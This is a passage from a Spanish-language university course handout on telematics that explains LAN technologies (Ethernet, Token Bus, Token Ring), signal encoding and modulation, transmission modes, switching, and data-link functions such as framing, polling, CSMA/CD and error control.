Tecnologías de Red y Topologías


Ethernet
La red Ethernet es una tecnología desarrollada en 1973 por un equipo de investigadores del Centro de
Investigaciones de Xerox en Palo Alto (PARC, Palo Alto Research Center). Las redes Ethernet pueden
configurarse en estrella o bus. Antiguamente por lo general el cable coaxial era el tipo de cableado
usado como medio de transmisión con una estructura de tipo bus. Hoy día las redes Ethernet se
estructuran con cable UTP, conectores RJ-45 y equipos concentradores como Hubs o Switch. En este
último caso la topología de red es híbrida, lógicamente un bus y físicamente una estrella. La redes
Ethernet son normadas bajo el estándar IEEE 802.3 y el métodos de acceso al medio que usa es
CSMA/CD (Acceso Múltiple Sensible al Portador con Detección de Colisión).

Token Bus
La red Token Bus combina la topología de bus y el método de acceso al medio paso de testigo de las
Token Ring. El medio de transmisión es cable coaxial, las tasas de transferencia varían entre 1 y 10
Mbps. Este tipo de redes está normalizada por el estándar IEEE 802.4, y su uso no está muy extendido.
La red debe ser capaz de transmitir a todos los dispositivos conectados al Bus. Para ello se divide la
señal utilizando dos canales de transmisión, uno para la señal de ida y otro para la señal de vuelta.
Cuando una señal llega al final de la red por un canal, se re-modula (cambio de frecuencia) y se envía
por el otro canal de regreso. Esto permite a cualquier estación comunicarse con cualquier otra,
independiente de su posición dentro de la red.
Se utiliza una técnica de paso de testigo sobre una red que no es un anillo físico, pero sí un anillo
lógico. Todos los dispositivos tienen una dirección dentro de la red de forma que cada dispositivo
transmite a la siguiente dirección lógica del bus.
La red Token Bus tiene la ventaja de ser fácil de instalar ya que el cableado es más sencillo que en las
redes en anillo. El inconveniente principal es que se produce sobrecarga en la red al tener que capturar
por cada dispositivo el testigo, regenerarlo y tener que enviárselo al siguiente dispositivo.

Token Ring
La red Token Ring de IBM, normada por el estándar IEEE 802.5. En si la Token Ring es una mezcla de
tecnologías, que usa el paso de testigo como método de acceso (anillo) y las conexiones de sus nodos a
nivel físico van a un concentrador. Por lo tanto esta tecnología es híbrida de las topologías estrella y

____________________________________________________________________________________________________________________
UNdeC Página 13
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

anillo. La Token Ring utiliza la topología estrella junto con un dispositivo llamado MAU (Multi-station
Access Unit, Unidad de Acceso Multi-estación), que funciona como elemento central de la red (forma
física). Sin embargo, esta tecnología también utiliza la topología anillo (funcionamiento lógico de la
MAU a nivel de enlace de datos). El tipo de cableado usando en una Token Ring puede ser coaxial o
UTP. La configuración de la Token Ring con cable coaxial usa dos cables para conectarse al
concentrador; el nodo conectado transmite datos hacia el concentrador por una línea y recibe datos por
las otra. El uso del cable UTP conecta cada nodo con el concentrador.

2.3. Comunicaciones de Datos


Concepto que abarca toda transferencia de información entre dos puntos o dos soportes cualesquiera
dentro de un campo cubierto por un sistema de comunicación, basado en tratamiento por computador
de aquella información.

Frecuencia
Las señales pueden ser continuas o discretas, las señales continuas más sencillas son las periódicas
como por ejemplo un onda sinuosidad:
Representación de una señal continua:
s(t + T) = s(t)
donde t es el tiempo y T es el periodo.
Cualquier función seno se puede representar por amplitud, frecuencia y fase:
Expresión general:
s(t) = A sen (2 p f t + f)
donde la fase f es la posición relativa de la señal dentro de n periodo de la misma.
Amplitud

Valor pico de
T=1/f la señal

Figura 10. Señal sinuosidad continua

Datos analógicos y digitales


Los datos digitales toman valores discretos (números, caracteres)
Los datos analógicos toman valores en cierto intervalo continuo (vídeo, voz, sensor de temperatura)
Así como se tienen datos digitales y analógicos, también se tienen señales digitales y analógicas. La
señal analógica es un onda electromagnética que varia continuamente. La señal digital es una secuencia
de pulsos de tensión entre valores positivos y negativos representando el 1 y el 0 lógico.

Perturbaciones en la transmisión
Las señales sufren perturbaciones producidas por degradaciones, en las perturbaciones más
significativas se tienen:
Atenuación y distorsión de atenuación
Distorsión de retardo
Ruido
La atenuación es la energía de la señal que decae con la distancia en cualquier medio de transmisión.
La distorsión de retardo es un fenómeno de los medios guiados, causado por el hecho de que velocidad
____________________________________________________________________________________________________________________
UNdeC Página 14
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

de propagación de la señal varía con la frecuencia.


Dentro del ruido se tienen 4 tipos:
El ruido térmico (o ruido blanco) que es la agitación térmica de los electrones, el ruido
ínter modulación que se produce cuando existen dos señales de distinta frecuencia en el mismo medio,
la diafonía que es un acoplamiento no deseado y el ruido impulsivo que son pulsos irregulares de corta
duración y de amplitud relativamente grande.

Codificación de Datos
La transmisión analógica se basa en en una señal continua y de frecuencia constante, denominada
portadora. Esta se elige para compatibilidad del medio que se va a utilizar. Entonces los datos se
pueden transmitir modulando la señal portadora.
La modulación es el proceso de codificar los datos generados por la fuente en la señal portadora de la
frecuencia. La modulación implica la modificación de los parámetros de amplitud, frecuencia y fase.
La señal de entrada puede ser tanto análoga como digital y se denomina señal moduladora o también
señal en banda base, s(t). Las cuatro posibles combinaciones mostradas en la figura 11 se utilizan con
frecuencia; si bien, las razones por las que se elige pueden ser de diversa índole, como las que se
indican a continuación:
Datos digitales, señales digitales.
Datos analógicos, señales digitales.
Datos digitales, señales analógicas.
Datos analógicos, señales analógicas.

g(t)

x(t) g(t)
g(t) Codificador Decodificador
Digital o Digital
Analógica

m(t
)
s(t) m(t
m(t) Modulador Demodulador )
Digital o Analógico
Analógica

Figura 11. Técnicas de Codificación y Modulación

Datos digitales, Señales digitales


Las señales digitales son secuencias de pulsos de tensión discretos, cada pulso de una señal digital es
un elemento de señal y los datos binarios se transmiten codificando cada bit de datos en cada elemento
de señal.

Términos básicos
Señal unipolar: Es cuando todos los elementos de una señal son del mismo signo.
Señal polar: Es un estado lógico que se representa mediante un nivel positivo de tensión y el otro
mediante un nivel negativo.
Razón de datos de una señal (Bit Rate): Velocidad de transmisión de datos expresados en bit por
segundo.
Duración o longitud de un bit: Tiempo empleado para emitir un bit.
Velocidad de modulación: Velocidad a la que cambia el nivel de señal. Se expresa en baudios que
constituye un elemento de señal por segundo.

Interpretación de las señales


El receptor debe conocer, la duración de cada bit; cuando comienza y cuando termina.
Los factores que determinan el éxito o fracaso del receptor al interpretar la señal de entrada serían:
La relación señal a ruido.

____________________________________________________________________________________________________________________
UNdeC Página 15
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

La velocidad de Transmisión de datos


El ancho de banda.

Definición de los formatos de codificación digital de señales


NRZ-L No retorno a a cero
0 = nivel alto
1 = nivel bajo

NRZI No retorno a cero invertido


0=No hay transmisión al comienzo del intervalo (un bit)
1=No hay señal

Bipolar AMI
0=No hay señal
1=Nivel positivo o negativo alternante

Pseudoaleatoria
0=Nivel positivo o Negativo alternante
1=No Hay señal

Manchester
0=Transición de alto a bajo en la mitad del intervalo
1=Transición de bajo a alto en la mitad del intervalo

Manchester diferencial
Siempre hay una transición en la mitad del intervalo
0=Transición al principio del intervalo
1=No hay transición al inicio del intervalo

NRZ-L: Se mantienen los niveles de tensión diferentes para cada uno de los bits, ausencia de tensión
representa un cero y la tensión negativa 1.

Figura 12. Formatos de codificación con señal digital.

NRZI: Los datos se representan de acuerdo a la transición de la señal. Los códigos NRZ pueden ser
susceptible a diferencias de temporización.

Bipolar-AMI: En este caso el 0 se representa por ausencia de señal y el uno se representa por un pulso
positivo o negativo. Todos los pulsos correspondientes a los unos (1s) deben tener polaridad alternante.

Con este esquema no habrá problemas de sincronización con cadenas largas de unos (1s). Si embargo
cadenas largas de cero aún constituyen un problema.
En el caso de Pseudoternario el bit 1 se representa por ausencia de señal y el cero por pulsos de
polaridad alternante.
En el código Manchester siempre hay una transición en la mitad del intervalo de duración del bit. Esto
sirve como sincronización a la vez que transmite datos: Una transición bajo alto representa un 1 y una

____________________________________________________________________________________________________________________
UNdeC Página 16
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

transición alto bajo representa un 0.


En el Manchester diferencial la codificación de un 0 se representa por la presencia de una transición al
principio del intervalo del bit y un 1 por ausencia de transición.

Ventajas del Manchester diferencial:


Sincronización: Debido a la transición que siempre ocurre durante el intervalo de duración
correspondiente a un bit, el receptor puede sincronizarse usando dicha transición.
No tiene componente continua: Con todas las implicaciones antes mencionadas.
Detección de errores: Se pueden detectar errores si se detecta una ausencia de transición esperada en
la mitad del intervalo.

Datos digitales, Señales Analógicas


Técnicas de codificación
La modulación afecta a uno o más parámetros característicos de la señal portadora (Amplitud,
Frecuencia y Fase. Por esto existen tres técnicas básicas de codificación o de modulación, que
transforman los datos digitales en señales analógicas.
Desplazamiento de Amplitud (ASK, ―Amplitudes-Shift Keying).
Desplazamiento de Frecuencia (FSK, ―Frecuency-Shift Keying).
Desplazamiento de Fase (PSK,‖Phase-Shift Keying).
En todos estos casos la señal resultante ocupa un ancho de banda centrado en torno a la frecuencia
portadora.

Figura 13. Modulación para datos digitales.

En ASK los dos valores binarios se representan mediante amplitudes diferentes de la portadora,
En FSK los valores binarios se representan por dos frecuencias diferentes, próximas a la frecuencia
portadora.
En PSK la fase de la señal portadora es desplazada, con ello los datos digitales.

Datos analógicos, Señales digitales


A este proceso se puede hacer referencia como la conversión de datos analógicos en datos digitales,
también llamado digitalización.
Cuando los datos son convertidos a datos digitales, puede ocurrir lo siguiente:
Los datos digitales se transmiten usando NRZ-L. En este caso, se ha realizado directamente una
conversión de datos analógicos a señales digitales.
Los datos digitales se codifican usando un código diferente al NRZ-L. Por lo que es necesario un
paso adicional.
Los datos digitales se convierten en señales analógicas usando algunas de las técnicas
mencionadas anteriormente.

Digitalizador Modulador

____________________________________________________________________________________________________________________
UNdeC Página 17
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

Datos Analógicos Datos Digitales Señal Analógica


(voz) (NRZ_L) (ASK)

Figura 14. Digitalización de datos analógicos.

El dispositivo que se usa para la conversión de los datos analógicos en digitales y posteriormente
recupera los datos analógicos iniciales de los digitales se denomina CODEC (Codificador/Decodificador).
Existen dos técnicas usadas en los CODEC:
Modulación por Impulsos Codificados
Modulación Delta

Modulación por impulsos Codificados


Esta modulación está basada en el teorema del muestre que en síntesis dice: ―Si una señal f(t) se
muestrea a intervalos regulares de tiempo con una frecuencia mayor que el doble de la frecuencia
significativa más alta de la señal, entonces las muestras así obtenidas contienen toda la información
de la señal original‖.
Si los datos de voz se limitan a frecuencias por debajo de los 4000 Hz, para caracterizar completamente
la señal de voz, sería suficiente obtener 8000 muestras por segundo, o sea, una muestra cada 125
microsegundos.
Modulación Delta
La modulación delta surge como una técnica mejorada con respecto a la Modulación por Impulsos
codificados.

Datos Analógicos, Señales Analógicas


Las señales de voz se transmiten a través de línea telefónicas usando su espectro original, esto se
denomina transmisión en banda base.
Existen casos en los que no es posible transmitir las señales en su forma original, debido a que para
llevar a cabo una transmisión más efectiva puede que se necesite una frecuencia mayor. Para medios no
guiados, es prácticamente imposible transmitir señales en banda base ya que las antenas serían
exageradamente grandes (varios kilómetros).
Algunos de los tipos de modulación analógica son:
Modulación en Amplitud (AM)
Modulación en Frecuencia (FM)
Modulación en Fase (PM)

Figura 15. Modulación en amplitud, fase y frecuencia de una portadora.

Transmisión de datos
La transmisión de datos puede ser entendida como el movimiento de información que ha sido o va ha
ser procesada y codificada, generalmente en forma binaria, sobre algún sistema de transmisión eléctrico
u óptico.
Es preciso entonces la existencia de una fuente de datos (emisor), un destinatario (receptor) y un
camino de unión entre ambos.

____________________________________________________________________________________________________________________
UNdeC Página 18
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

Elementos de un sistema de transmisión

Figura 16. Elementos de un sistema de transmisión

[ETD] Equipo Terminal de Datos: Cumple con dos funciones básicas: Ser fuente o destino final de los
datos y controlar la comunicación. Este concepto engloba tanto los normalmente denominados
terminales más o menos inteligentes como también el más completo computador.
[ETCD] Equipo de Terminación de Circuito de Datos: Elemento cuya misión consiste en transformar
las señales portadoras de la información a transmitir, utilizada por los ETD.
[Línea] Conjunto de medios de transmisión que une los ETCD: cuya constitución dependerá de la
distancia, velocidad, etc. Y que debe cumplir unas determinadas especificaciones, apoyándose siempre
en la infraestructura de comunicación.
[ED] Enlace de Datos: Unión entre fuente y colector de datos, formado por los controladores de
comunicación, ETCD y Línea.
[CD] Circuito de Datos: Conjunto formado por los ETCD (modems) y la línea cuya misión será
entregar en la interfaz con el ETD colector las señales bajo la misma forma y con la misma
información que recibió en la interfaz con el ETD fuente.

Un ejemplo para clarificar lo anteriormente expuesto estaría dado cuando se establece una
comunicación entre dos computadores, haciendo uso de una interfaz serial o paralela.

PC PC
Interfaz Serial Interfaz Serial
RS23 RS23
2 2

Figura 17. Conexión por interfaz serial.

Transmisión de Datos en Serie y Paralelo


Transmisión en Serie: Con independencia del código, tipo de transmisión, velocidad, etc, los datos son
transmitidos bit a bit utilizando un único canal. Es la forma normal de transmitir datos a grandes
distancias.
Transmisión en Paralelo: En este caso se transmiten simultáneamente todos los bits de un carácter o
de una palabra de maquina, lo que implica un medio de transmisión con tantos canales como bits
contenga el elemento base. Ello implica una mayor complejidad del medio y redunda en una mayor
velocidad de
transmisión.

Transmisión asíncrona
En las figura 6 los n bits que forman la palabra del código correspondiente, van siempre precedidos de
un bit 0 llamado bit de arranque (o start) y seguidos al menos, de un bit 1 conocido como bit de parada

____________________________________________________________________________________________________________________
UNdeC Página 19
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

(o stop), que puede ser en algunos sistemas de 1 o 2 bits. El conjunto citado constituye un carácter,
pudiendo mediar entre dos consecutivos, cualquier separación. Este tipo de transmisión se basa en la
existencia dentro del receptor de una base de tiempos (reloj), teóricamente igual a la que debe existir en
el transmisor.

Figura 6. Transmisión asíncrona ó (inicio/parada)

El sincronismo de bit se alcanza arrancando el reloj del receptor en el mismo instante en que se
comienza el bit de arranque.
El sincronismo de carácter es aquí muy simple ya que el receptor sabe que el primer bit significativo es
siempre el que sigue al arranque.

Transmisión Síncrona
En la transmisión síncrona los datos fluyen de la fuente al colector con una cadena fija y constante,
marcada por una base de tiempos común para todos los elementos que intervienen en la transmisión.
La señal de sincronismo, en el extremo transmisor, puede estar generada por el ETD o el ETCD, según
los casos, pero siempre es común en ambos. En el extremo receptor el ETCD (módem) reconstruye la
señal de reloj de origen a partir de la señal recibida en línea, realizándose en él, el sincronismo de bit y
entrega al ETCD ambas señales (datos y reloj) sincronizadas.
El sincronismo de carácter se hace en el ETD mediante el envío de combinaciones especiales de bits
irrepetibles por el desplazamiento, recibidas estas confirmaciones, el ETD sabe que cada n bits
consecutivos forman un carácter.

Modos de explotación de un circuito de datos


Los computadores utilizan diferentes métodos para transmitir información, estos métodos determinan el
modo en que se usará el circuito de datos para la transmisión de información.
Simplex: La transmisión se realiza solamente en un sentido sin posibilidad de hacerlo en el sentido
opuesto. Este método no es muy usado en la transmisión de datos.
Semi duplex: La transmisión se lleva a cabo alternativamente en uno o otro sentido, exigiendo un
cierto tiempo para cada inversión (esto reduce la eficiencia del sistema).
Este modo de explotación es el más corrientemente usa en la transmisión de datos, incluso sobre
circuitos que permiten el modo duplex.
Duplex (Full-Duplex): Consiste en la transmisión simultánea e independiente en ambos sentidos, ya
sea enviando datos los dos, o bien datos en uno y control de los mismos en otro. Este método si bien
reporta gran eficiencia de la línea, exige unos terminales muy complicados, por lo que raramente es
usado salvo en la unión de computadores.

Comunicación Conmutada
Para la transferencia de información las redes utilizan comunicación conmutada, que permite a los
dispositivos (hardware) compartir líneas físicas de comunicación.
Conmutación de circuitos
La conmutación de circuitos, crea una ruta única e ininterrumpida entre dos dispositivos que quieren
comunicarse. Durante el tiempo que dure la comunicación, ningún otro dispositivo puede usar esa ruta.
Cuando la comunicación ha finalizado, la ruta se libera para que otros dispositivos puedan utilizarla.
Dicho de otro modo, la conmutación de circuitos permite a varios dispositivos compartir las líneas de
conmutación, pero cada uno debe esperar sus turno para hacer uso de ellas.
Generalidades de la conmutación de circuitos:

____________________________________________________________________________________________________________________
UNdeC Página 20
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

El circuito físico se establece antes de iniciar la transmisión.


Buena para el flujo continuo de información, mala para discontinuo.
La recepción se realiza con un retardo fijo respecto de la la transmisión.
La red no almacena la información.
Para establecer la conexión se necesita un tiempo que es relevante para el funcionamiento de la
red.
Tasa de errores alta.

Conmutación de paquetes
Las redes de computadores usan conmutación de paquetes. Por ejemplo, Internet es una gran red de
paquetes conmutados. De hecho la conmutación de paquetes consiste en la división de los datos en
pequeños fragmentos independientes denominados paquetes, estos son transmitidos por los
computadores a la red. Los paquetes buscan su destino de acuerdo a una estructura denominada
cabecera que contiene la información del origen y destino del paquete.
Generalidades de la conmutación de paquetes
Los datos son tratados por la red como mensajes.
Los nodos encaminan los paquetes hacia su destino.
Los nodos son:
o Inteligentes con capacidad de procesamiento de paquetes recibidos.
o Poseen Memoria para almacenar los paquetes recibidos hasta su transmisión hacia el
siguiente nodo.
Retar de recepción variable.
Alta disponibilidad de la red.
Baja tasa de errores.
Adecuada para fuentes intermitentes.

2.4. Funciones a Nivel de Enlace


Para asegurar los objetos fundamentales del control de enlace de datos (Data Link Control , DLC), las
entidades de la capa de enlace de datos (ED) tienen que cumplir tanto con las exigencias del medio de
comunicación, como con las del usuario. En el transcurso del tiempo se ha establecido un conjunto de
funciones generales de ED, actualmente comunes para todos los protocolos de este nivel, sin embargo,
la forma en que se realizan estas funciones varía con el tipo y grado de sofisticación de un protocolo
particular. El conjunto de de estas funciones se presentan a continuación:
A. Inicialización de la Comunicación
B. Identificación
C. Transparencia
D. Segmentación y Delimitación de la Trama.
E. Sincronismo de la Trama.
F. Coordinación de la Comunicación (Acceso al Medio).
G. Control de Errores y de Secuencia.
H. Control de Flujo
I. Recuperación de Fallas
J. Terminación de la Comunicación
K. Gestión de enlace
L. Estrategias de retransmisión
Estas funciones como tales comprenden un conjunto de ―servicios‖ del DE, que pone a disposición del
sistema a través de los límites de la capa de red.

Inicialización de la Comunicación
La función de inicialización esta relacionada con el establecimiento de una conexión activa de enlace
de datos, sobre un canal físico existente. Este canal puede ser formado por uno o varios circuitos
físicos. La adquisición de esta canal y el movimientos de los bits sobre él, es de por si responsabilidad
del medio físico. La inicialización como tal, normalmente, involucra un intercambio de secuencia de
control que sirven para establecer la disponibilidad para recibir o trasmitir datos y en cuanto sea
necesario a la vez también determinar la identificación de las partes.

Identificación
El proceso de Identificación es necesario para identificar un determinado receptor o transmisor entre

____________________________________________________________________________________________________________________
UNdeC Página 21
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

varios presentes en una configuración multipunto o entre un gran número accesible de interlocutores a
través de una red conmutada. La identificación a nivel del ED normalmente se realiza a través del
intercambio de una dirección de ED, a veces asignada a priori. El proceso de identificación puede a
veces exigir un intercambio de parámetros de acuerdo a las características o capacidad de las
estaciones que se comunican.

Transparencia
La función de transparencia permite al control de ED ser totalmente ―transparente‖ , tanto de la
estructura, como del formato de la información del usuario. De esta manera el usuario puede transmitir
su información en cualquier código, formato o longitud con la seguridad que su información no será
interpretada como datos de control del ED.

Segmentación y Delimitación de la Trama


El mecanismo para formar bloques o tramas es necesario con el fin de dividir la información del
usuario en segmentos adecuados para la transmisión a través del ED. Los bloques extremadamente
largos corren peligro de no poder sobrevivir sin errores en un ambiente de transmisión ruidoso. Por otro
lado, bloques muy cortos pueden resultar ineficientes. En mecanismo de formar bloques y tramas apoya
electrónicas proceso de sincronización en la identificación de los datos de usuario y provee de bloques
adecuados para la detección de errores.

Sincronización
Clases de Sincronismo

sincronismo de bit

En el circuito físico los datos se transmiten en serie, siendo recuperados en el receptor por medio de un
reloj que debe estar en sincronía con el transmisor. Esta clase de sincronismo esta a cargo del nivel
físico. Para asegurar que el nivel físico establezca sincronía sin necesidad de disponer de un canal
adicional, paralelo al canal de datos dedicado a la transmisión de reloj, se conocen diversas técnicas de
extracción de reloj a partir de una señal de datos recibida, codificada en un código ―en línea‖. Para
disminuir el tiempo de adquisición del sincronismo de bit, se utilizan como preámbulo secuencias con
transiciones tales como: 01010101010101010...

Sincronismo de carácter

Cuando la transmisión de datos se efectúa en forma de bytes o caracteres, es preciso agrupar los bits
recibidos en esta forma, cosa que realiza a nivel físico. Habitualmente los caracteres son de longitud
fija y la sincronización de carácter se establece con uno a varios caracteres de sincronización, enviados
a principios de la transmisión y posterior cuenta de bits. Es decir, los bits recibidos introducen en un
registro de desplazamiento de longitud igual a un caracter de sincronización. A partir de ese momento
los caracteres se forman por simple cuenta de bits. La sincronización de caracter puede efectuarse con
un convertidor de serie-paralelo especializado, denominado comercialmente USART (Transmisor,
Receptor, Asíncrono, Síncrono, Universal).

Sincronismo de Trama

Se trata de un función propia de Enlace de Datos, que consiste en recuperar los mensajes y delimitar las
tramas a partir de la secuencia de bits o de caracteres recibidos por el medio físico. Este sincronismo es
también responsable por un buen funcionamiento del sincronismo de carácter, controlando su
adquisición, mantenimiento y restablecimiento, como así mismo por el alineamiento del mecanismo de
decodificación del receptor con el del transmisor. En el nivel de enlace, los datos recogidos del nivel
superior se agrupan parea su transmisión formando tramas (paquetes, bloques, mensajes) que incluyen
bits de redundancia (SVT, CRC, LRC, BCC) y otros bits de control del protocolo. Para delimitar el
principio y fin de la trama se usan caracteres de control o cadenas de bits específicos. El uso de estos
delimitadores puede restringir el conjunto de caracteres utilizables por el nivel superior y para poder
transmitir cualquier cadena binaria es preciso adoptar mecanismos de transparencia que remuevan esas
limitaciones.

____________________________________________________________________________________________________________________
UNdeC Página 22
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

Métodos de Sincronismo de Trama


Básicamente existen 3 estrategias al respecto, las dos primeras utilizan caracteres de control de un
alfabeto tal como ASCI, EBDIC o Transcodigo de 6 bits.

Principio y Fin

Para marcar el principio (PDT) y el fin (FDT) utiliza los caracteres de control de uno de los alfabetos
mencionados, tales como:
STX: Start of Text
SOH: Start Of Header
ETX: End of Text
ETB: End of Block
CC: Son otros caracteres de control, tales como origen y destino de la trama, CRC, etc.

Principio y Cuenta

Empieza con un número que marca el principio y continuación indica el número de caracteres
contenidos en la trama.

Guión o Bandera

Una muestra fija de bits (bandera) marca tanto el principio como el fin de la trama. Cuando aparece la
misma combinación en el texto, se intercala un cero.

Coordinación de la Comunicación - Acceso al Medio


Para coordinar la comunicación se necesitan reglas que determinan el turno de intervención a través del
enlace. De esta manera, a nivel de enlace existen los siguientes métodos básicos de coordinación de la
comunicación

Centralizado
La coordinación centralizada en un controlador es típica de los primeros sistemas teleinformáticos,
donde un grupo de terminales accede a un recurso central (computador concentrador de terminales) que
posee además las funciones de moderador y la comunicación se desarrolla entre el recurso central y los
terminales sin que exista comunicación directa entre terminales. En función del sentido del flujo de
información los procedimientos se denominan: Sondeo (Polling) que es el flujo del terminal al
controlador, y selección (SLECT) que es el flujo del controlador al terminal.

Selección

Cuando el controlador desee enviar información a un terminal lo selecciona mediante un mensaje de


control, el terminal responde si está listo o no para recibirlo.
La primera fase de la comunicación es el establecimiento del enlace mediante el mensaje de selección y
la respuesta correspondiente. Si esta es positiva, el enlace está establecido y se entra en la fase de
transferencia de información, el controlador envía tramas de información y el terminal confirma su
correcta recepción con un ACK (Respuesta de reconocimiento). Una vez que no hay más información
que transmitir se entra en la fase de terminación del enlace con la transmisión del mensaje
correspondiente.
Si es poco probable que el terminal no esté preparado para recibir, puede utilizarse una variable más
eficiente, la ―selección rápida‖, que consiste en añadir los datos al propio mensaje de selección.

Sondeo

a. Sondeo por lista


El Sondeo por lista es la forma clásica de sondeo. El controlador ―Pasa Lista‖ a cada uno de los
terminales, presentándoles si tienen información para trasmitir , mediante un mensaje de sondeo con el
código de dirección correspondiente al terminal. Si éste tiene algún mensaje grabado, lo transmite, en
caso contrario, rechaza la gestión a transmitir y el controlador pasa a sondear el siguiente terminal de la
lista.
____________________________________________________________________________________________________________________
UNdeC Página 23
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

b. Sondeo con prueba


Cuando la actividad de los terminales es baja y su número es elevado, el controlador desperdicia mucho
tiempo en sondear terminales que casi nunca tienen información para transmitir. Una alternativa más
eficiente, en esas circunstancias, es el sondeo con prueba, que consiste en agrupar a los terminales en
diferentes grupos, de modo que cada terminal reconoce dos direcciones: una individual y otra de grupo.
Al reconocer un terminal su dirección de grupo, si tiene información pendiente transmite una
indicación, en caso contrario permanece en silencio. El controlador al sondear un grupo, envía su
dirección global; si algún terminal tiene información se activará la línea y entonces el controlador
efectuará un sondeo individualizado dentro del grupo; en caso contrario, ningún terminal tiene
información; la línea permanece inactiva y el controlador procede a sondear otro grupo.
c. Sondeo Circular
En el sondeo por lista los mensajes de sondeo recorren cada vez el trayecto desde el controlador al
terminal; si éstos están distribuidos a lo largo de una extensa línea de transmisión, con un retardo de
propagación elevado, se desperdicia mucho tiempo, pues los mensajes de sondeo sucesivos recorren
largos trayectos, que coinciden en su mayor parte. Una solución más eficiente, es el sondeo circular
(hub polling), que consiste en empezar el ciclo de sondeo enviando un mensaje de sondeo a un
terminal, y éste, una vez se vacía, si no lo estaba ya, envía un mensaje de sondeo a otro terminal y se
repite el proceso hasta que el último terminal envía un mensaje de sondeo al controlador.
Con protocolos orientados a bit se ha realizado un eficiente forma de sondeo circular, asociada a una
red en bucle que utiliza como mensaje de sondeo el octeto 01111111. De forma que, cuando un
terminal recibe este octeto, si no tiene nada que transmitir lo retransmite con un retraso de un bit), pero
si tiene un mensaje preparado invierte el último bit y el mensaje de sondeo se orienta en el guión de
apertura de trama, 01111110, y a continuación envía el mensaje; los demás terminales retransmiten el
mensaje hacia el controlador.

Hemos descrito las técnicas de sondeo circular utilizando un campo de aplicación clásico, las redes de
acceso a un recurso central. No obstante, su fundamento operativo ( el paso de un testigo para ceder el
turno de transmisión), también es identificable en ciertos sistemas de acceso múltiple (Token passing
bus, Token passing ring), usados en al ámbito de redes locales. La diferencia de matiz estriba en el
hecho de poder transmitir a cualquier otro interlocutor conectado a la línea (y no sólo al recurso
central); pero sigue siendo necesaria la presencia de un controlador o, mejor dicho, de un supervisor
que evite el bloqueo del sistema al extraviarse el testigo, (por ejemplo por caída del terminal que
detenta el turno de transmisión).

Coordinación descentralizada: Contienda


En otros sistemas no existe un moderador que conceda la palabra ni se utiliza un testigo con el mismo
fin. En esta solución los interlocutores pueden acceder en cualquier momento al circuito. Si dos o más
de ellos tratan de transmitir al mismo tiempo, pueden presentarse conflictos al competir en una
"contienda" por posesionarse del circuito. Por ejemplo, sean dos terminales unidos por un enlace
semidúplex, que intentan comunicarse al unísono; para ello cada uno intenta establecer el enlace y envía
un carácter ENQ (supuesto un protocolo orientado a carácter) pero ninguno lo recibe, pues ambos están
en transmisión y cuando pasan a la escucha no reciben nada. Otra situación de conflicto puede
presentarse en redes de acceso múltiple al superponerse transmisiones de dos o más terminales, que
por tanto no serán reconocidas por ningún receptor.
La característica básica de esos conflictos es que un transmisor envía un mensaje y se queda esperando
una respuesta que nunca llegará. Para evitar esa eventual situación de bloqueo se establecen plazos de
espera (timeout), de forma que si expira el plazo sin recibir respuesta, se retransmite el mensaje. No
obstante, este mecanismo no basta para evitar bloqueos. Pues si ambos retransmiten a la vez hay una
nueva colisión.
Esta situación se resuelve de forma que, tras detectar el bloqueo (por ausencia de respuesta), no se
efectúa la retransmisión hasta después de un plazo diferente para cada interlocutor (predeterminado,
dando prioridad a alguno de los interlocutores, o bien obtenidos en su momento por generadores de
número pseudoaleatorios), de forma que quien tenga plazo menor retransmitirá el primero, sin
colisionar con los anteriores. Pero no sólo interesa recuperarse de la colisión; más interés tiene tratar de
evitarla. Una forma muy sencilla de prevenirlas es escuchar entes de transmitir; existen una variedad
de técnicas de "auscultación" utilizadas en las redes de acceso múltiple (redes locales). Con la
auscultación simple (CSMA, carrier sense multiple access) garantizamos que no se empiece una
transmisión mientras haya otra en curso.
No obstante, dos transmisiones iniciadas a la vez colisionan. Para detectar inmediatamente esa colisión
y no tener que esperar a que expire el plazo de la respuesta se utiliza la auscultación con detección de

____________________________________________________________________________________________________________________
UNdeC Página 24
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

colisión (CSMA/CD-collision detect), que detecta si los datos en el circuito coinciden con los
transmitidos por el propio terminal; si son diferentes se sabe que hay colisión y se aborta la transmisión
retransmitiendo tras un plazo. Existen muchas variantes de estas técnicas diseñadas para mejorar aún
más el rendimiento, en función del tipo de tráfico y topología de la red.
Destacamos el hecho de que los protocolos de enlace utilizados en redes locales son diferentes de los
clásicos, no sólo por trabajar en modo contienda de acceso múltiple, que no se ha utilizado en
aplicaciones de teleproceso, sino también por la necesidad de incluir en las tramas las direcciones del
remitente y el destinatario, al permitir la transferencia de información entre cualquier par de
interlocutores conectados a la red local, mientras que los protocolos clásicos sólo incluyen la dirección
del terminal, ya que la transferencia de información se efectúa exclusivamente entre el recurso central y
los terminales.

Control de Errores de Secuencia


Se utilizan códigos de protección contra errores para contrarrestar los efectos del ruido en el circuito.
Existen diversas familias de códigos con deferentes propiedades detectores, y correctoras. No obstante,
en aplicaciones teleinformáticas se utilizan casi exclusivamente técnicas de detección de errores y
petición de retransmisión (ARQ, automatic repear requiest); pues la corrección de errores tiene una
complejidad elevada y sólo se justifica su uso en condiciones extremas (típicamente cuando el retardo
de propagación es muy grande y es ineficiente retransmitir; por ejemplo, en transmisiones espaciales).
Para corregir errores de transmisión se emplean dos métodos:

Método Directo:
Por medio de un código corrector de errores se ubican y corrigen los errores. Existe una gran variedad
de esta clase de códigos con fundamentación matemática muy sólida y altamente desarrollada. Sin
embargo su implementación resulta muy complicada con la excepción de algunos códigos poco
eficientes y otros, llamados ―Recurrentes‖, cuya redundancia es por lo menos 50%. Se emplean en
casos excepcionales y en comunicaciones vía satélite, donde el método ―indirecto‖ basado en
retransmisión resulta inaplicable por un retardo excesivo.

